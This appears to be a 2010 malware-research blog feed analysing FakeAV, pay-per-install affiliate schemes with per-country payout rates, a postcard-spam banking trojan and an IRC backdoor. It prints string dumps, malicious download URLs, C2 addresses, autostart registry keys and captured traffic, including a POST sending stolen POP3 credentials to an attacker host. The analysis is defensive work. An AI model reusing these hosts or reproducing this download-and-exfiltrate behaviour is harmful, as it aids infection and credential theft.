0x00004DCC	0x00000018	ZwQuerySystemInformation
0x00004DE8	0x0000001C	RtlImageDirectoryEntryToData
0x00004E08	0x0000000F	KeInitializeApc
0x00004E1A	0x00000010	KeInsertQueueApc
0x00004E2E	0x0000000F	ZwCreateSection
0x00004E40	0x00000012	ZwMapViewOfSection
0x00004E56	0x00000014	ZwUnmapViewOfSection
0x00004E6F	0x0000000A	fLowerIrql
0x00004E7D	0x00000014	eRaiseIrqlToDpcLevel
0x00004E92	0x00000007	HAL.dll
0x00004E9C	0x00000006	memcpy
0x00004EA6	0x00000006	memset
0x000091B8	0x00000028	\systemroot\PRAGMAtisvbvxtng\PRAGMAd.sys
0x000092C0	0x00000010	PRAGMAtisvbvxtng
0x000093C8	0x0000000B	PRAGMAd.sys
0x000094D0	0x00000050	\systemroot\PRAGMAtisvbvxtng\PRAGMAd.sys
0x000096D8	0x00000020	PRAGMAtisvbvxtng
0x000098E0	0x00000016	PRAGMAd.sys
0x00009CF8	0x00000090	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PRAGMAtisvbvxtng\modules
0x00009F00	0x00000080	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PRAGMAtisvbvxtng
0x0000A108	0x00000028	\systemroot\PRAGMAtisvbvxtng\PRAGMAc.dll
0x0000A210	0x00000050	\systemroot\PRAGMAtisvbvxtng\PRAGMAc.dll
0x0000B1D0	0x00000005	.text
0x0000B1F7	0x00000009	`.datatxt
0x0000B21F	0x00000007	@.rdata
0x0000B247	0x00000007	@.ldata
0x0000B26F	0x00000007	@.rdsec
0x0000B298	0x00000005	.rsrc
0x0000B2BF	0x00000007	@.sdata
0x0000B2E7	0x00000007	@.mdata
0x0000B30F	0x00000007	@.kdata
0x0000B337	0x00000007	@.edata
0x0000FB0D	0x00000006	9^_t\`
0x000124A0	0x0000000C	kernel32.dll
0x000124AF	0x0000000F	GetCommandLineA
0x000124C1	0x0000000C	GetTempPathA
0x000124D0	0x0000000B	CloseHandle
0x000124DE	0x0000000F	GetStartupInfoA
0x000124F0	0x0000000E	VirtualProtect
0x00012501	0x00000009	FatalExit
0x0001250E	0x0000000A	user32.dll
0x0001251B	0x00000012	IsDlgButtonChecked
0x00012530	0x0000000C	GetUpdateRgn
0x00012832	0x0000000A	cseteo.exe
0x0001283D	0x00000007	Caokyjf
0x00015E60	0x00000005	.text
0x00015E87	0x00000007	`.rdata
0x00015EAF	0x00000006	@.data
0x00015ED8	0x00000005	.test
0x00015F00	0x00000006	.reloc
0x0001F3C9	0x00000005	}GijY

So in conclusion, FakeAV’s often download other nastiness, only use reputable applications and only download them from their creators websites.

Pay-Per-Install Analysis – Part Two

Wed, 30 Jun 2010 12:31:35 +0000

WorldPays – Euro-Pays – SummerCash

Next on the list we have 3 companies, who are distributing the same executable, so its safe to assume either they are all resellers for a single company, or 2 of them are reselling for the other.

From the above images we can extract some dangerous domains used for spreading the payloads:

super-cool-tube.com
real-antivir-4pc.com
sfree-crack-service.com
great-tube-fest.com
hotcelebsnow.com
datamediaworld.com
anti-vir-protect.com

Euro-Pays rates per install:

Rates
GB	0.15$
DE	0.14$
GR	0.07$
ES	0.07$
AT	0.07$
PT	0.01$
BE	0.07$
IT	0.07$
CH	0.14$
DK	0.14$
FR	0.14$
SE	0.14$
NL	0.14$
NO	0.14$

SummerCash rates per install:

0	0.01
US	0.4
GB	0.32
CA	0.16
AU	0.16
NO	0.12
DK	0.12
NZ	0.12
SE	0.12
PR	0.12
DE	0.12
ES	0.1
IT	0.1
FR	0.1
CH	0.08
BE	0.08
NL	0.08
AT	0.08
FI	0.08
ZA	0.08
IS	0.08
IE	0.08
JP	0.03
SG	0.03
CY	0.03
HK	0.03
MU	0.03
GR	0.03
IL	0.03

There was no rates list for WorldPays. As you can see there is quiet a difference for the 2 companies, SummerCash pays double what Euro-Pays does for some countries, for the same executable.

Instead of posting sandbox reports for all 3 companies I will just show you the similarities.

All make connections to:

Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to "216.240.146.119" on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to "62.122.75.42" on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to "64.20.35.3" on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to "69.10.35.253" on port 80 (TCP - HTTP).
Internet connection: C:\WINDOWS\Xmitoa.exe Connects to "67.210.170.183" on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtl.exe Connects to "64.191.82.25" on port 80 (TCP - HTTP).

Below there is the IPVoid.com scan reports for the above IP addresses:

216.240.146.119
62.122.75.42
64.20.35.3
69.10.35.253
67.210.170.183
64.191.82.25

All create these files:

1
2
3

Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtj.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtk.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtl.exe

All add the same startup key:

1	Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\M5T8QL3YW3 = C:\Documents and Settings\Administrator\Local Settings\Temp\Xtl.exe

To be continued…

Pay-Per-Install Analysis – Part One

Tue, 22 Jun 2010 13:58:27 +0000

What is Pay-Per-Install(PPI)?

Pay-Per-Install is a system where people get paid for installation of software, 9 times out of 10 without the knowledge of the end-user.Ã‚Â The amount the affiliate gets paid depends which country the victim is in, countries like USA normally get the highest rates, while other less-known countries get little or nothing.Ã‚Â Some companies have existed since 2004 and even today still carry on pumping out various malware types.Ã‚Â Banking trojans, downloaders, spam-bots, backdoors, proxy-bots, rootkits, any “software” will do with these guys.

I managed to gain access to some of these companies, some of which aren’t publicly known, and invite only.

Earning4U

This is a company that has existed for a long time.Ã‚Â Was previously called InstallsCash, and before that IframeDollars.Ã‚Â IframeDollars was a known associate of the RBN.

Here you can see the stats panel of Earning4U, you can see the date, how many downloads they had, table of countries which they’ve installed in, how many unique installs they’ve got (unique installs are installs from a single IP/PC, multple installations on the same PC won’t count), and the amount of money these installs have earned them.

Another bad thing is that the loader is updated often to avoid Antivirus detections, it looks like they update the main EXE loader every 3 or 4 days.

This is how much Earning4U pays for 1000 unique installs per country(US dollars).

United StatesÃ‚Â Ã‚Â Ã‚Â Ã‚Â Ã‚Â Ã‚Â 180
United KingdomÃ‚Â Ã‚Â Ã‚Â 110
NetherlandsÃ‚Â Ã‚Â Ã‚Â 30
FranceÃ‚Â Ã‚Â Ã‚Â 30
PolandÃ‚Â Ã‚Â Ã‚Â 20
ItalyÃ‚Â Ã‚Â Ã‚Â 65
GermanyÃ‚Â Ã‚Â Ã‚Â 30
SpainÃ‚Â Ã‚Â Ã‚Â 30
AustraliaÃ‚Â Ã‚Â Ã‚Â 55
GreeceÃ‚Â Ã‚Â Ã‚Â 30
OtherÃ‚Â Ã‚Â Ã‚Â 20
AsiaÃ‚Â Ã‚Â Ã‚Â 8

This is a list of strings from the unpacked executable provided by Earning4U.

0Ãƒâ€”000001D0 0Ãƒâ€”00000005 .text
0Ãƒâ€”000001F7 0Ãƒâ€”00000006 `.data
0Ãƒâ€”00000220 0Ãƒâ€”00000008 .textbss
0Ãƒâ€”00000248 0Ãƒâ€”00000006 .rdata
0Ãƒâ€”0000026F 0Ãƒâ€”00000006 @.rsrc
0Ãƒâ€”00000297 0Ãƒâ€”00000007 @.debug
0Ãƒâ€”000002B0 0Ãƒâ€”00000007 /c del
0Ãƒâ€”000002B8 0Ãƒâ€”00000005 COMS@
0Ãƒâ€”000002BF 0Ãƒâ€”00000039 @%svzdlfahpxe.php?adv=adv510&code1=%s&code2=%s&id=%d&p=%s
0Ãƒâ€”00000300 0Ãƒâ€”0000000A %senrl.exe
0Ãƒâ€”0000030C 0Ãƒâ€”00000017 %skksahc.php?adv=adv510
0Ãƒâ€”00000324 0Ãƒâ€”0000000B %sdltfh.exe
0Ãƒâ€”00000330 0Ãƒâ€”00000016 %siickf.php?adv=adv510
0Ãƒâ€”00000348 0Ãƒâ€”0000000E %samycwrkf.exe
0Ãƒâ€”00000358 0Ãƒâ€”00000019 %sjjaiqxsq.php?adv=adv510
0Ãƒâ€”00000374 0Ãƒâ€”0000000E %shhyawghp.exe
0Ãƒâ€”00000384 0Ãƒâ€”00000019 %sjwrlgbvd.php?adv=adv510
0Ãƒâ€”000003A0 0Ãƒâ€”0000000C %sgwetlq.exe
0Ãƒâ€”000003B0 0Ãƒâ€”0000001B %swzdytaicxe.php?adv=adv510
0Ãƒâ€”000003CC 0Ãƒâ€”0000000C %smvjjsb.exe
0Ãƒâ€”000003DC 0Ãƒâ€”0000001B %sgkbjdlwqlt.php?adv=adv510
0Ãƒâ€”000003F8 0Ãƒâ€”00000008 %seetj.e
0Ãƒâ€”000010A8 0Ãƒâ€”00000006 > nul
0Ãƒâ€”000010B0 0Ãƒâ€”00000007 /c del
0Ãƒâ€”000010B8 0Ãƒâ€”00000007 COMSPEC
0Ãƒâ€”000010C0 0Ãƒâ€”00000038 %svzdlfahpxe.php?adv=adv510&code1=%s&code2=%s&id=%d&p=%s
0Ãƒâ€”00001100 0Ãƒâ€”0000000A %senrl.exe
0Ãƒâ€”0000110C 0Ãƒâ€”00000017 %skksahc.php?adv=adv510
0Ãƒâ€”00001129 0Ãƒâ€”00000006 fh.exe
0Ãƒâ€”00001130 0Ãƒâ€”00000016 %siickf.php?adv=adv510
0Ãƒâ€”00001148 0Ãƒâ€”0000000E %samycwrkf.exe
0Ãƒâ€”00001158 0Ãƒâ€”00000019 %sjjaiqxsq.php?adv=adv510
0Ãƒâ€”00001174 0Ãƒâ€”0000000E %shhyawghp.exe
0Ãƒâ€”00001184 0Ãƒâ€”00000019 %sjwrlgbvd.php?adv=adv510
0Ãƒâ€”000011A0 0Ãƒâ€”0000000C %sgwetlq.exe
0Ãƒâ€”000011B0 0Ãƒâ€”0000001B %swzdytaicxe.php?adv=adv510
0Ãƒâ€”000011CC 0Ãƒâ€”0000000C %smvjjsb.exe
0Ãƒâ€”000011DC 0Ãƒâ€”0000001B %sgkbjdlwqlt.php?adv=adv510
0Ãƒâ€”000011F8 0Ãƒâ€”0000000A %seetj.exe
0Ãƒâ€”00001204 0Ãƒâ€”00000016 %sgxbjd.php?adv=adv510
0Ãƒâ€”0000121C 0Ãƒâ€”0000000D %sggmohsv.exe
0Ãƒâ€”0000122C 0Ãƒâ€”0000001B %suiptnmgovj.php?adv=adv510
0Ãƒâ€”00001248 0Ãƒâ€”0000000A %sjuih.exe
0Ãƒâ€”00001254 0Ãƒâ€”00000017 %sggbrzx.php?adv=adv510
0Ãƒâ€”0000126C 0Ãƒâ€”0000000D %silwxubb.exe
0Ãƒâ€”0000127C 0Ãƒâ€”00000017 %sffmhcw.php?adv=adv510
0Ãƒâ€”00001294 0Ãƒâ€”0000000A %swfpk.exe
0Ãƒâ€”000012A0 0Ãƒâ€”00000019 %skksaupwr.php?adv=adv510
0Ãƒâ€”000012C4 0Ãƒâ€”00000018 %sptxfnhp.php?adv=adv510
0Ãƒâ€”000012E0 0Ãƒâ€”00000021 hxxp://bgroundplatt.com/yulgbvqk/
0Ãƒâ€”00001304 0Ãƒâ€”0000001C hxxp://agrofee.com/yulgbvqk/
0Ãƒâ€”00001328 0Ãƒâ€”00000005 ver54
0Ãƒâ€”00001F8F 0Ãƒâ€”00000012 nternetCloseHandle
0Ãƒâ€”00001FA5 0Ãƒâ€”0000000F nternetReadFile
0Ãƒâ€”00001FB9 0Ãƒâ€”0000000D ttpQueryInfoA
0Ãƒâ€”00001FCA 0Ãƒâ€”00000012 InternetSetOptionA
0Ãƒâ€”00001FE1 0Ãƒâ€”0000000F nternetOpenUrlA
0Ãƒâ€”00001FF5 0Ãƒâ€”0000000C nternetOpenA
0Ãƒâ€”00002002 0Ãƒâ€”0000000B WININET.dll
0Ãƒâ€”00002011 0Ãƒâ€”00000014 btainUserAgentString
0Ãƒâ€”00002026 0Ãƒâ€”0000000A urlmon.dll
0Ãƒâ€”00002035 0Ãƒâ€”0000000A xitProcess
0Ãƒâ€”00002042 0Ãƒâ€”00000011 SetThreadPriority
0Ãƒâ€”00002056 0Ãƒâ€”00000010 GetCurrentThread
0Ãƒâ€”0000206A 0Ãƒâ€”00000011 GetCurrentProcess
0Ãƒâ€”0000207E 0Ãƒâ€”00000010 SetPriorityClass
0Ãƒâ€”00002092 0Ãƒâ€”00000008 lstrcatA
0Ãƒâ€”0000209E 0Ãƒâ€”00000008 lstrcpyA
0Ãƒâ€”000020AA 0Ãƒâ€”00000017 GetEnvironmentVariableA
0Ãƒâ€”000020C4 0Ãƒâ€”00000011 GetShortPathNameA
0Ãƒâ€”000020D8 0Ãƒâ€”00000012 GetModuleFileNameA
0Ãƒâ€”000020EE 0Ãƒâ€”00000016 WaitForMultipleObjects
0Ãƒâ€”00002108 0Ãƒâ€”0000000D GetSystemTime
0Ãƒâ€”00002118 0Ãƒâ€”0000000B GetFileSize
0Ãƒâ€”00002127 0Ãƒâ€”0000000A reateFileA
0Ãƒâ€”00002134 0Ãƒâ€”0000000B CloseHandle
0Ãƒâ€”00002142 0Ãƒâ€”00000013 WaitForSingleObject
0Ãƒâ€”00002159 0Ãƒâ€”0000000B reateThread
0Ãƒâ€”00002168 0Ãƒâ€”00000016 GetSystemDefaultLangID
0Ãƒâ€”00002182 0Ãƒâ€”0000000C GetTempPathA
0Ãƒâ€”00002192 0Ãƒâ€”00000015 GetVolumeInformationA
0Ãƒâ€”000021AB 0Ãƒâ€”00000009 xitThread
0Ãƒâ€”000021B9 0Ãƒâ€”0000000D reateProcessA
0Ãƒâ€”000021CA 0Ãƒâ€”00000009 WriteFile
0Ãƒâ€”000021D4 0Ãƒâ€”0000000C KERNEL32.dll
0Ãƒâ€”000021E4 0Ãƒâ€”00000009 wsprintfA
0Ãƒâ€”000021EE 0Ãƒâ€”0000000A USER32.dll
0Ãƒâ€”000021FC 0Ãƒâ€”00000010 DirectDrawCreate
0Ãƒâ€”0000220E 0Ãƒâ€”00000009 DDRAW.dll
0Ãƒâ€”0000221B 0Ãƒâ€”0000000D HChangeNotify
0Ãƒâ€”0000222D 0Ãƒâ€”0000000E hellExecuteExA
0Ãƒâ€”0000223C 0Ãƒâ€”0000000B SHELL32.dll
0Ãƒâ€”00003B71 0Ãƒâ€”00000007 &y%ZgXJ
0Ãƒâ€”00008241 0Ãƒâ€”00000019 qvSHCreateShellFolderView
0Ãƒâ€”0000825B 0Ãƒâ€”0000000B SHELL32.dll
0Ãƒâ€”00008269 0Ãƒâ€”0000000B CloseHandle
0Ãƒâ€”00008277 0Ãƒâ€”0000000C LoadLibraryA
0Ãƒâ€”00008287 0Ãƒâ€”00000017 QueryPerformanceCounter
0Ãƒâ€”000082A0 0Ãƒâ€”0000000C qExitProcess
0Ãƒâ€”000082AF 0Ãƒâ€”0000000C VirtualAlloc
0Ãƒâ€”000082BD 0Ãƒâ€”0000000C KERNEL32.dll
0Ãƒâ€”00009558 0Ãƒâ€”0000001E VS_VERSION_INFO
0Ãƒâ€”000095B4 0Ãƒâ€”0000001C StringFileInfo
0Ãƒâ€”000095D8 0Ãƒâ€”00000010 040904B0
0Ãƒâ€”000095F0 0Ãƒâ€”00000016 CompanyName
0Ãƒâ€”0000961C 0Ãƒâ€”0000001E FileDescription
0Ãƒâ€”0000963E 0Ãƒâ€”0000001E Kernel Veryfier
0Ãƒâ€”00009664 0Ãƒâ€”00000016 FileVersion
0Ãƒâ€”0000967E 0Ãƒâ€”0000001A 2.4.4587.1000
0Ãƒâ€”000096A0 0Ãƒâ€”00000018 InternalName
0Ãƒâ€”000096CC 0Ãƒâ€”0000001C LegalCopyright
0Ãƒâ€”000096EA 0Ãƒâ€”00000010 eSXi (c)
0Ãƒâ€”00009704 0Ãƒâ€”00000020 OriginalFilename
0Ãƒâ€”00009726 0Ãƒâ€”00000010 KVFR.EXE
0Ãƒâ€”00009740 0Ãƒâ€”00000016 ProductName
0Ãƒâ€”0000975A 0Ãƒâ€”0000001E Kernel Veryfier
0Ãƒâ€”00009780 0Ãƒâ€”0000001C ProductVersion
0Ãƒâ€”0000979E 0Ãƒâ€”0000001A 2.4.4587.1000
0Ãƒâ€”000097C0 0Ãƒâ€”00000016 VarFileInfo
0Ãƒâ€”000097E0 0Ãƒâ€”00000016 Translation

One interesting thing to note is the PHP scripts won’t let you download the file if “ver54″ isn’t appended to the end of the user agent, which is got by using the ObtainUserAgentStringA API.

This is a brief sandbox analysis of the executable.

Created Files:
 
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\bookmarkbackups\bookmarks-2010-06-02.json
C:\Documents and Settings\Administrator\Local Settings\Temp\5d0a4d64.tmp
C:\WINDOWS\$NtUninstallMTF1011$\apUninstall.exe
C:\WINDOWS\riap60.dll
C:\WINDOWS\system32\arrbofhrxumbzdpr.dll
C:\WINDOWS\system32\bbayi.exe
C:\WINDOWS\system32\kbayi.dll
C:\WINDOWS\system32\nywpppobpt.exe
C:\WINDOWS\system32\obayi.dll
C:\Documents and Settings\Administrator\Local Settings\Application Data\kbwcodnrj\pumdfehtssd.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\jghrjtyu.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\juih.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\mvjjsb.exe
C:\Program Files\$NtUninstallWTF1012$\elUninstall.exe
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\localstore.rdf
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\pluginreg.dat
 
Registry Startup Entries:
 
HKLM\software\microsoft\Windows\CurrentVersion\Run\iriuusum:
C:\Documents and Settings\Administrator\Local Settings\Application Data\kbwcodnrj\pumdfehtssd.exe
HKLM\software\microsoft\Windows\CurrentVersion\Run\MChk:
C:\WINDOWS\system32\bbayi.exe
HKLM\software\microsoft\Windows\CurrentVersion\Run\odjzobioswzpnm:
C:\WINDOWS\System32\regsvr32.exe /s "C:\WINDOWS\system32\arrbofhrxumbzdpr.dll"
HKLM\software\microsoft\Windows\CurrentVersion\Run\skb:
rundll32 "obayi.dll",,Run
HKLM\system\CurrentControlSet\Services\1519672323\ImagePath:
C:\WINDOWS\system32\drivers\1519672323.sys
HKCU\current\software\Microsoft\Windows\CurrentVersion\Run\Aruluya:
rundll32.exe "C:\WINDOWS\riap60.dll",Startup
HKCU\current\software\Microsoft\Windows\CurrentVersion\Run\iriuusum:
C:\Documents and Settings\Administrator\Local Settings\Application Data\kbwcodnrj\pumdfehtssd.exe
 
Registry Modifications:
 
HKLM\system\CurrentControlSet\Services\1519672323\Type = 01000000
HKCU\current\software\Microsoft\Internet Explorer\Toolbar\Locked = 01000000
HKCU\current\software\appdatalow\software\{97db103a-ec69-12c0-8972-4b581bd21e32}\aff_id = voguecash
 
Internet Connections: 
 
C:\Documents and Settings\Administrator\Desktop\your_exe.exe Connects to "195.2.252.153" on port 80 (TCP - HTTP).
C:\Documents and Settings\Administrator\Desktop\your_exe.exe Connects to "195.2.252.157" on port 80 (TCP - HTTP).
C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to "72.55.140.184" on port 80 (TCP - HTTP).
C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to "72.55.174.185" on port 80 (TCP - HTTP).
C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to "77.245.58.4" on port 80 (TCP - HTTP).
C:\Documents and Settings\Administrator\Local Settings\Temp\RarSFX0\vocd610.exe Connects to "208.43.86.21" on port 80 (TCP - HTTP).
C:\Documents and Settings\Administrator\Local Settings\Temp\wfpk.exe Connects to "64.191.38.165" on port 80 (TCP - HTTP).
 
Modifed files in Network Shares:
 
\\127.0.0.1\admin$\system32\drivers\aec.sys
\\127.0.0.1\admin$\system32\drivers\asyncmac.sys
\\127.0.0.1\admin$\system32\drivers\Cdaudio.sys
\\127.0.0.1\admin$\system32\drivers\dmusic.sys
\\127.0.0.1\admin$\system32\drivers\drmkaud.sys
\\127.0.0.1\admin$\system32\drivers\imapi.sys
\\127.0.0.1\admin$\system32\drivers\ip6fw.sys
\\127.0.0.1\admin$\system32\drivers\ipfltdrv.sys
\\127.0.0.1\admin$\system32\drivers\ipinip.sys
\\127.0.0.1\admin$\system32\drivers\irenum.sys
\\127.0.0.1\admin$\system32\drivers\kmixer.sys
\\127.0.0.1\admin$\system32\drivers\Modem.sys
\\127.0.0.1\admin$\system32\drivers\mskssrv.sys
\\127.0.0.1\admin$\system32\drivers\mspclock.sys
\\127.0.0.1\admin$\system32\drivers\mspqm.sys
\\127.0.0.1\admin$\system32\drivers\nwlnkflt.sys
\\127.0.0.1\admin$\system32\drivers\nwlnkfwd.sys
\\127.0.0.1\admin$\system32\drivers\RDPWD.sys
\\127.0.0.1\admin$\system32\drivers\redbook.sys
\\127.0.0.1\admin$\system32\drivers\secdrv.sys
\\127.0.0.1\admin$\system32\drivers\Serial.sys
\\127.0.0.1\admin$\system32\drivers\Sfloppy.sys
\\127.0.0.1\admin$\system32\drivers\splitter.sys
\\127.0.0.1\admin$\system32\drivers\swmidi.sys
\\127.0.0.1\admin$\system32\drivers\TDPIPE.sys
\\127.0.0.1\admin$\system32\drivers\TDTCP.sys
\\127.0.0.1\admin$\system32\drivers\usbstor.sys
 
DNS Queries:
 
0002136011.249576ca.01 1EBF1D3D088D4E50AF2030A3A7E30896.n.empty.19.empty.5_1._t_i.ffffffff.your_exe_exe.154.rc2.a4h9uploading.com
aebankonline.com
agrofee.com
bgroundplatt.com
cnfg.kusochtak.com
cnfg.net-secured-app.com
sts.think-adz.com
vc0.voguecash.net
vc1.voguecash.net
www.deewoo.net

The executable is currently able to download anything up to 11 files, so after executing it you and your PC are in some serious danger.

To be continued…

Spam emails Cartoline.exe spread Spy.Banker Trojan

admin — Sun, 16 May 2010 20:40:08 +0000

In recent days we have registered a new wave of spam messages with subject as “Cartoline” that looked like to come from virgilio.it, and that contained a link that appeared to redirects the user to legitimate sites such as cards.virgilio.it. After analyzing the HTML in the message, we noticed that the link could redirect to a malicious web site and that had nothing to do with virgilio.it. After clicking the malicious link, was presented the box to download a file named cartoline.exe:

The mere fact that an email message that promotes the postcards and redirects the user to download an executable file, it is very suspicious, and in fact the file is infected with malware:

File name: cartoline.exe
File size: 601600 bytes
MD5 hash: 92a9346604726a7d26a51d3509f806e4
SHA1 hash: 8d6817f4d365419b1cd2ac07c8035798d94d0d6e
Detection rate: 9 on 20 (45%)
Status: INFECTED

a-squared 15/05/2010 5.0.0.7 Trojan-Downloader.Win32.Banload!IK
AVG 271.1.1/2877 9.0.0.725 Downloader.Agent2.WWA
Avira AntiVir 7.10.7.111 7.6.0.59 TR/Spy.Banker.Gen
Comodo 3468 3.13.579 Heur.Pck.Enigma
F-PROT6 20100515 4.5.1.85 W32/Heuristic-DL1!Eldorado
G-Data 21.171 2.0.7309.847 Trojan-Downloader.Win32.Agent.dqkq A
Ikarus T3 16/05/2010 1.1.84.0 Trojan-Downloader.Win32.Banload
Kaspersky 16/05/2010 9.0.0.736 Trojan-Downloader.Win32.Agent.dqkq
TrendMicro 171 9.120-1004 Mal_Banker

Here we can see the activity of the malware by analyzing the log file generated by Hijack Hunter:

[+] Running processes
 
C:\windows\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603)
 
[+] Registry startups
 
Value: Win32
Data: C:\windows\wain.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
[+] Files created/modified 15 days ago
 
C:\WINDOWS\nvsvs.exe (1033216 bytes) (Unknown) (5/14/2010 7:53:34 PM) (--A-) (613feb50b850e0695c47b81a383caf28) (Created)
C:\WINDOWS\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603) (Created)
C:\WINDOWS\wilps.exe (806400 bytes) (Unknown) (5/14/2010 7:55:16 PM) (--A-) (9e78023032221f2955e95d7394531245) (Created)

Network traffic:

POST /images/wab.php HTTP/1.0
Host: indiegear(dot)org
User-Agent: Mozilla/3.0 (compatible; Indy Library)
----------051410195548264
Content-Disposition: form-data; name="texto"
POP3(Identi):Pass(........L.......); 
-----------------------------
----------051410195548264--

From the traffic above we can see the malware is a passwords stealer and it sent data related to a POP3 account to the malicious host through the POST query to /images/wab.php.

GET /images/heade.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: junipero(dot)com(dot)br
 
GET /IT/contador.php HTTP/1.1
Host: www.richardmata(dot)xpg(dot)com(dot)br

From the last GET query, we can see this:

Estamos com 372 visitas

It should be the total number of the users that have clicked in the malicious link present in the email and that have been infected by the malware.

1
2
3

GET /midia/list.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: mariogesteiracosta(dot)com(dot)br

As always pay attenction when reading email, even if you think the email of the sender can be legit. Remember to never click in unknown links and always analyze the html code of the email to understand better where the link can redirect.

C’e’ una Cartolina per te! = Backdoor.IRC.Zapchast

admin — Fri, 19 Mar 2010 23:52:36 +0000

We have noticed new waves of spam messages, this time in Italian language only, that promote the message “Happy Easter” and contain malicious links that redirect the users to download a file named BuonaPasqua.gif.exe, detected as Backdoor.IRC.Zapchast and it looks like to be an ircbot.

Email headers:

Sender: Cartoline.Net
Subject: C’e’ una Cartolina per te!
Received: from naut2004.kultunaut.dk (1903ds1-by.1.fullrate.dk)
IP Address: 90.184.81.220

Malicious link present in the message:

GET /~nikolai/BuonaPasqua.gif.exe HTTP/1.0
Host: 194.79.14.129
Pragma: no-cache
 
HTTP/1.1 200 OK
Date: Fri, 19 Mar 2010 22:40:41 GMT

When the file is executed, it opens an image file named xmas.jpg:

At the same time we notice that a program named spoolsv.exe is trying to connect to a remote server and we get an alert from the Windows Firewall:

Network traffic:

Protocol          : TCP
Remote Address    : 200.174.131.226
Remote Port       : 6667
 
NICK kijo
NOTICE AUTH :*** Looking up your hostname
NOTICE AUTH :*** Checking Ident
 
USER henryett "" "200.174.131.226" :pingo
NOTICE AUTH :*** No ident response
 
SILENCE +*!*@*
MODE kijo +iwx
NOTICE AUTH :*** Couldn't look up your hostname
PING :74643361
:my.server.name 451 kijo SILENCE :Register first.
:my.server.name 451 kijo MODE :Register first.
:my.server.name 001 kijo :Welcome to the Internet Relay Network icyg
:my.server.name 002 kijo :Your host is my.server.name, running version beware1.5.7
:my.server.name 003 kijo :This server was created Tue Jul 13 2004 at 20:36:17 GMT
:my.server.name 251 kijo :There are 1 users and 9 invisible on 1 servers
:my.server.name 252 kijo 1 :operator(s) online
:my.server.name 254 kijo 2 :channels formed
:my.server.name 255 kijo :I have 10 clients and 0 servers
:my.server.name NOTICE kijo :Highest connection count: 14 (14 clients)
:my.server.name 422 kijo :MOTD File is missing
 
:kijo!~bijaikos@XXX.XXX.XXX.XXX JOIN :#bran
:my.server.name 353 kijo = #bran :kijo @Bran @sullyc @batmanv @bassemd @eviaq @daiseyx
:my.server.name 366 kijo #bran :End of /NAMES list.
 
:Bran!~lonut@Bran.ro MODE #bran +o kijo 
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giova a
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giovy a

Details on oper “Bran”:

WHOIS Bran
:my.server.name 311 kijo Bran ~lonut Bran.ro * :B
:my.server.name 319 kijo Bran :#bran
:my.server.name 312 kijo Bran my.server.name :I'm too lazy to edit ircd.conf
:my.server.name 313 kijo Bran :is an IRC Operator
:my.server.name 317 kijo Bran 622 1269018316 :seconds idle, signon time
:my.server.name 318 kijo Bran :End of /WHOIS list.
 
WHOWAS Bran
:my.server.name 314 kijo Bran ~lonut bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 15:03:19 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 14:04:23 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 13:57:47 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 11:43:16 2010
:my.server.name 369 kijo Bran :End of WHOWAS

The file spoolsv.exe looks like to be the executable of the legit application named mIRC but we notice something strange… why the icon tray has no icon ? After checking the files we notice that the skids have replaced the file mirc.ico with an empty icon and it become “invisible” in the icon tray:

Now let’s open the hidden mIRC and see how does it looks:

It is the legit version of mIRC, but a bit hijacked, we can see all the backgrounds of the chats are white to obfuscate the content, a simple change of the colors and here we go:

We can get useful info from the hidden files that are in the same folder where is the hidden spoolsv.exe, from the file users.ini we can see allowed users to chat with the hidden mIRC that is started in the infected user:

We can also see two files, respectively a.reg used to add the needed registry keys, for startup the hidden mIRC at every reboot of the system, in the windows registry and the file run.bat that is used to start the file a.reg and the hidden mIRC (spoolsv.exe):

All files created by the malicious file BuonaPasqua.gif.exe:

C:\WINDOWS\Temp\spoolsv
C:\WINDOWS\Temp\spoolsv\a.reg
C:\WINDOWS\Temp\spoolsv\aliases.ini
C:\WINDOWS\Temp\spoolsv\control.ini
C:\WINDOWS\Temp\spoolsv\mirc.ico
C:\WINDOWS\Temp\spoolsv\mirc.ini
C:\WINDOWS\Temp\spoolsv\remote.ini
C:\WINDOWS\Temp\spoolsv\run.bat
C:\WINDOWS\Temp\spoolsv\servers.ini
C:\WINDOWS\Temp\spoolsv\spoolsv.exe
